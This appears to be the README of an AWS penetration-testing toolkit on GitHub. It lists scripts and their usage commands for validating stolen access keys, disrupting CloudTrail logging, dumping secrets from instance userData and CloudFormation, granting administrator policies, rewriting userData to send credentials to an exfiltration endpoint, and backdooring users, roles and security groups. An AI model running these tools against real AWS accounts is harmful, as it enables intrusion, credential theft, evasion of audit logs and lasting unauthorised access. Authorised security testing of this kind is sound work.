AWS pwn

This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. It might be that AWS has changed since a given tool was written or it might be that the code sux.

Installation

git clone https://github.com/dagrz/aws_pwn.git
cd aws_pwn
pip install -r requirements.txt

Make sure to also set up your aws credentials in ~/.aws/credentials.

Use

Reconnaissance

Things to do with pre-compromise information gathering.

• validate_iam_access_keys.py – Given a TSV file of access key + secret [+ session] combinations, checks access validity and returns identity information of the principal.
  ./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
• validate_s3_buckets.py – Given a text file with one word per line, checks whether the buckets exist and return basic identifying information.
  ./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
• validate_iam_principals.py – Given a text file of principals (e.g. user/admin, role/deploy), checks whether the principals exist in a given account.
  ./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
• validate_accounts.py – Given a text file of account ids and account aliases, checks whether the accounts exist.
  ./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json

Exploitation

Things that will help you gain a foothold in an account.

Stealth

Things that might help you stay hidden after compromising an account.

• disrupt_cloudtrail.py – Attempts to disrupt/cripple cloudtrail logging in the specified way.
  ./disrupt_cloudtrail.py -s

Exploration

Things to help you understand what you’ve pwned.

• dump_account_data.sh – Calls a bunch of generic account-based read/list/get/describe functions and saves the data to a given location. Very noisy but great for a point in time snapshot.
  ./dump_account_data.sh /tmp/

Elevation

Things to help you move around an account and gather different levels of access.

• dump_instance_attributes.py – Goes through every EC2 instance in the account and retrieves the specified instance attributes. Most commonly used to retrieve userData, which tends to contain secrets.
  ./dump_instance_attributes.py -u -o /tmp/
• dump_cloudformation_stack_descriptions.py – Retrieves the stack descriptions for every existing stack and every stack deleted in the last 90 days. Parameters in stack descriptions often contain passwords and other secrets.
  ./dump_cloudformation_stack_descriptions.py -o /tmp/data
• assume_roles.py – Attempts to assume all roles (ARNs) in a file or provided by the list-roles API.
  ./assume_roles.py -o /tmp/out.json
• add_iam_policy – Adds the administrator and all action policy to a given user, role, or group. Requires IAM putPolicy or attachPolicy privileges.
  ./add_iam_policy.py -u myuser -r myrole -g mygroup
• bouncy_bouncy_cloudy_cloud – Bounces a given ec2 instance and rewrites its userData so that you can run arbitrary code or steal temporary instance profile credentials.
  ./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint

Persistence

Things to help maintain your access to an account.

• rabbit_lambda – An example Lambda function that responds to user delete events by creating more copies of the deleted user.
• cli_lambda – A lambda function that acts as an aws cli proxy and doesn’t require credentials.
• backdoor_created_users_lambda – A lambda function that adds an access key to each newly created user.
• backdoor_created_roles_lambda – A lambda function that adds a trust relationship to each newly created role.
• backdoor_created_security_groups_lambda – A lambda function that adds a given inbound access rule to each newly created security group.
• backdoor_all_users.py – Adds an access key to every user in the account.
• backdoor_all_roles.py – Adds a trust relationship to each role in the account. Requires editing the file to set the role ARN.
• backdoor_all_security_groups.py – Adds a given inbound access rule to each security group in the account. Requires editing the file to set the rule.

Exfiltration

Things to help you extract and move data around in AWSy ways.

• dynamodump – https://github.com/bchew/dynamodump

Miscellanea

Other things that I was either too stupid or too lazy to classify.

• reserved_words.txt – A list of words/tokens that have some special meaning in AWS or are likely to soon have some special meaning.
• endpoints.txt – A somewhat up to date list of API endpoints exposed by AWS.
• integrations.txt – A TSV of services that integrate with AWS via roles or access keys and their account IDS, default usernames etc.
• download_docs.sh – The command line to wget all the AWS docs because I’m stupid and waste time redoing it every time.

Source: https://github.com/dagrz/